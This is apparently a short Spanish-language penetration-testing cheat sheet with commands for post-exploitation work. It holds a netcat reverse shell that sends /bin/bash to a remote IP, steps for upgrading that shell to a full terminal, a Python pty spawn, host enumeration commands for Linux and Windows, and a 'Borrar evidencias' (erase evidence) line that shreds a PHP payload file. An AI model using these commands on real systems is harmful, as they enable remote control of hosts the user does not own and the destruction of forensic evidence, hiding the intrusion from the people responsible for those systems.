script /dev/null -c bash
# Ctrl + Z
stty raw -echo;fg
reset xterm
export TERM=xterm SHELL=bash
# stty -a en tu terminal para ver config
stty rows <x> cols <y>
Reenviar simple bash
nc -lvnp <Port>
nc <IPa> <Port> -e /bin/bash
Python simple shell
python -c 'import pty; pty.spawn("/bin/sh")'
Checkear
whoami # username
id # user groups
ifconfig # Config de red > IP correcta? contenedor?
env # variables de entorno > Contenedor?
uname -a # OS version
netstat -an # Conexiones de red
ps -ef # Procesos activos
whoami # username
ver # OS version
ipconfig /all # Configuración de red
set # variables de entorno
netstat -an # Conexiones de red
tasklist # Procesos activos
Borrar evidencias:
shred -zun 20 -v <payload.php> # Para qué quieres esto? Eres un blackhat?